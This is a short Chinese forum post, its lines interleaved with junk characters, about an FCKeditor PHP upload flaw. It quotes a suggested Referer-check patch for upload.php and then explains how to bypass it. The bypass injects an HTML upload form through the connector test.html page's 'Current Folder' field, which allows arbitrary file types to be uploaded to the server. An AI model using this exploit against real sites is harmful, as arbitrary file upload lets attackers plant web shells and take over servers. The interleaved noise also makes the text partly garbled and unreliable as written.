漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php0 P: ~5 m6 v* `2 e
网上给出的修复方案是
; {) ~ e0 T9 N" b修复方法,删除FCK编辑器用其他的编辑器
5 t2 o% g* z& x/ i4 ~+ R H6 o' v或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件: v! d" N/ ]$ P. u$ ?
在
% B) R' o' E% C1 z3 Wrequire(‘config.php’);
- H" |- q' H; | K5 Vrequire(‘util.php’);
4 X, q J7 e% c" ~1 p) C的下面添加以下代码—————————–
s) ~0 T# p3 K* e//防止外部提交
9 B- Z' m4 C; |! Kfunction outsidepost()! O6 Y" i; X0 L" l/ o1 V$ O; O W/ u
{0 `4 u; s! m& _7 y& O+ P# \7 M
$servername=$_SERVER['SERVER_NAME'];
$ _, |' |5 v* U8 R$sub_from=@$_SERVER['HTTP_REFERER'];: h8 |: Y6 i) G$ u8 J0 k
$sub_len=strlen($servername);
+ z) y9 ~/ e7 n$ M$checkfrom=substr($sub_from,7,$sub_len);
8 d+ K) u/ D" ]3 }& ^if($checkfrom!=$servername){" i# y7 K' A1 C1 E& x; v6 S p; t
echo(“you don’t outsidepost!”);4 e+ v4 N$ _6 w& [4 f. N6 `7 g+ K
exit;/ z& c; p/ R) w( \+ n: d
}, c( u' h! s+ z; d; i( a
}
8 t" i( P% j2 Z6 A9 ioutsidepost();" L2 g. x7 h5 Q0 }
防止外部提交,但是没有防止内部提交,
) c" x" I! R: ^* k! k+ L* C利用方法:
- b- ]7 c; [( j0 _$ a1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
# a/ I: X1 J7 v0 Q9 H! D6 @2,在Current Folder 框输入
1 d+ F. b1 ?% O<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
0 g6 B' K! ^* f6 t% a, }# Y然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
# \. z* F" {; z+ fPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |